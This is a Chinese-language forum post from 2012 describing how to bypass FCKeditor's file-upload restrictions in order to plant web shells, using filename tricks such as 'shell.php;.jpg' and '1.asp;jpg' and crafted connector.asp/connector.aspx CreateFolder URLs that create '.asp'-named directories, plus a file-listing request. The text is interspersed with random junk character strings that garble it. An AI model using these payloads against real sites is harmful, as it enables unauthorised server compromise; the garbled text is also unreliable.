很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
P8 O% F5 e" Q9 D* ^
" O% B( l" C% q. D' {2 a提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
' m/ y1 r* }8 M1 z0 p$ o& r! c8 S& D2 x$ q) F9 r0 ^" `
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
. L, ?* o" g8 A
1 r; P9 m0 `. {7 ]. k2 r突破建立文件夹:& M* g. v# c4 c5 `. d3 p9 Y
5 j1 Q2 c8 r* ^editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
) ?# F0 k/ ` j/ Y/ ]% G' V0 s/ X( q! }& c9 L) t8 I& `
参数:2 m) J" L4 Y# W3 V
% y5 _6 m8 ?$ ?8 Q
当前目录名:CurrentFolder=/qing.asp t" V& y A& ^; \/ ?0 q2 G
# d/ f5 F5 h1 ^6 C新的目录名:NewFolderName=x.asp+ m" L3 Y: M7 l6 W/ O5 L! I
8 L$ R' E* S+ c: i7 s3 j. B
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写…… c/ v' X* R* g* T. x
* `. y- o( `$ Z+ |! u, D那么 x.asp 就已经建立生成了,此方法百试百灵!$ q# @+ [' Y v
2 ~! J- o( e" N! }4 V: d( j0 N新建文件夹参数 x.asp,基本都能搞定。
) b" G# f6 O' S! V' W' n
/ w% F9 O2 x0 }4 [$ M! @4 y下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
8 g+ g. V+ L/ O: W2 A9 N r" H% p# m6 \# C4 h- W3 M
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
+ T; l! U [- B" h2 q9 p& j6 X5 f9 U8 O8 V1 i1 K
获取文件列表7 c8 k E0 A! n0 h0 w8 T/ ^
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F, m6 ]2 V/ F& n
6 `/ ]+ ~) t" I$ m H- L |
发表于 2012-12-31 09:27:09
收藏
支持
反对